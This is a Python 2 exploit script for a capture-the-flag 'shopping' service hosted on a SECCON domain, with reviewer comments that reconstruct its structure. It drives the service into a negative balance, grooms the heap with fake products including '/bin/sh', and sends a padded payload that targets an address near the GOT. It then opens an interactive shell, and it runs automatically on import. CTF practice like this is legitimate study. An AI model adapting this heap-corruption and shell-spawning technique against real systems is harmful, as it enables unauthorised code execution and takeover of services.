# NOTE(review): this listing reached us collapsed onto two physical lines
# with all indentation lost; the block structure below is a reconstruction
# from the statement order and should be confirmed against the original.
# The `print` statements are Python 2 syntax, so the file targets Python 2.
import time
import phun

# Set (never read anywhere in this file) when the service replies with a
# line starting with 'W' on entering the shop menu; see R.shop().
have_neg = False


class R(phun.Remote):
    """Menu-driven client for the remote shopping service.

    Every method here is a scripted exchange: wait for a prompt via
    self.read(), then answer via self.sendline()/self.write(). The prompt
    strings (': ', '>> ', '#\\n', '&\\n', ')\\n', '.') are the service's own
    and the whole class breaks if the server-side text changes.
    """

    def choose(self, nr):
        """Answer the next ': ' menu prompt with the option number nr."""
        self.read(': ')
        self.sendline(str(nr))

    def bug_report(self, n, b):
        """Fill in the two-field bug-report form.

        n and b are written raw (self.write, not sendline), so the caller is
        responsible for any trailing newline the service expects.
        """
        self.read('#\n')
        self.read(': ')
        self.write(n)
        self.read(': ')
        self.write(b)
        self.read("\n")

    def shop(self, cmd, *args):
        """Enter the shop sub-menu and select option cmd.

        If the first byte after entering the menu is 'W', the service is
        asking a yes/no question; the code answers 'y' and then hands *args
        to bug_report(). args is empty for every caller except run()'s
        r.shop(0, ...) call, so a 'W' reply on any other path would raise a
        TypeError inside bug_report().
        """
        global have_neg
        self.choose(1)
        n = self.read(1)
        if n == 'W':
            print '[+] got negative cash'
            have_neg = True
            self.sendline('y')
            self.bug_report(*args)  ## bug report
        # Reconstructed as unconditional: add_product/list_product/free_product
        # rely on their option being chosen even when no 'W' line appeared.
        self.choose(cmd)

    def add_product(self, *args):
        """Shop option 1: answer one '>> ' prompt per field in args, then leave the menu."""
        self.shop(1)
        for x in args:
            self.read('>> ');self.sendline(x)
        # Bare expression statement: evaluates `self` and discards it (no effect).
        # Probably a leftover from an edited line.
        self
        self.choose(0)

    def list_product(self):
        """Shop option 2: generator yielding each listed line until 'LIST DONE'.

        Because this is a generator, the trailing self.choose(0) only runs
        if the caller exhausts it. Not used by run() below.
        """
        self.shop(2)
        self.read('&\n')
        while True:
            x=self.read('\n')
            if 'LIST DONE' in x: break
            yield x
        self.choose(0)

    def free_product(self):
        """Shop option 3, then leave the menu. Not used by run() below."""
        self.shop(3)
        self.choose(0)

    def bugrep_show(self, n=None, b=None):
        """Top-level option -1: display the stored report and optionally edit its fields.

        Returns None if the first reply byte is 'N', otherwise the text read
        up to ')\\n'. When n (or b) is given the matching field is rewritten
        with self.write(), i.e. without an added newline.
        """
        self.choose(-1)
        if self.read(1) == 'N': return None
        self.read('#\n')
        ret=self.read(')\n')
        self.read('>> ')
        if n:
            self.sendline('y')
            self.read(': ')
            self.write(n)
        else:
            self.sendline('n')
        self.read('>> ')
        # NOTE(review): purpose of the fixed 5 s pause is not evident from
        # this file — presumably waits for a server-side step; confirm.
        time.sleep(5)
        if b:
            self.sendline('Y\n')
            self.read(': ')
            self.write(b)
        else:
            self.sendline('n')
        return ret

    def cart_add(self, n, x):
        """Cart menu (2) -> option 1: add product named n with quantity x."""
        self.choose(2)
        self.choose(1)
        self.read('>> ')
        self.sendline(n)
        self.read('>> ')
        self.sendline(str(x))
        self.choose(0)

    def buy(self):
        """Cart menu (2) -> option 3: check out, wait for the closing '.', leave."""
        self.choose(2)
        self.choose(3)
        self.read('.')
        self.choose(0)

#r = R('localhost',1234)

def run(off):
    """Drive one full session against the hard-coded remote host.

    off is used twice: once inside the value passed through shop() to
    bug_report(), and once to size the 'X' padding of the second payload.
    The function returns None on every path, so the commented-out
    `while not run(...)` retry loop at the bottom could never terminate.
    """
    r = R('shopping.pwn.seccon.jp',16294)
    r.add_product('a','1073741824','1073741824')
    r.cart_add('a',1)
    r.buy()
    r.cart_add('a',1)
    r.buy()
    r.cart_add('a',1)
    r.shop(0,'a','A'*42 + phun.p64(off+1) + "\n")
    #r.shop(0,'asdf\n','A'*42 + phun.p64(0x1a1) + "\n")
    ## some fake products
    r.add_product('asdfasd1','0','1000000')
    r.add_product('asdfasd2','0','1000000')
    r.add_product('asdfasdf','0','1000000')
    r.cart_add('asdfasdf',0x42180)
    r.add_product('\x01'*8,'0','1000000')
    r.add_product('/bin/sh','0','0')
    print '[+] heap setted up'
    # The first fake_struct and the first payload are dead stores: each is
    # overwritten by the following line before being used.
    fake_struct = phun.p64(0x603018 - 0x10,0x3be20,0)
    fake_struct = phun.p64(0x603018 - 0x10,0x3c770,0)
    payload = phun.p64(0x400007)*28 + fake_struct + '\n'
    payload = "X"*((off - 80)) + fake_struct +"\n"
    print '[*] payload size', hex(len(payload))
    #raw_input('x')
    r.bugrep_show(n=payload)
    try:
        r.buy()
        r.read(':');r.read(':')
        print '[*] shellz?'
        r.shop(3)
        r.shell()
    # Bare except: any failure here (connection drop, unexpected prompt,
    # KeyboardInterrupt in Python 2) is swallowed with no diagnostic.
    except: pass

#for i in range(100):
#    while not run(160 + i*8):pass

# Module-level side effect: a network session starts on import.
run(0x190)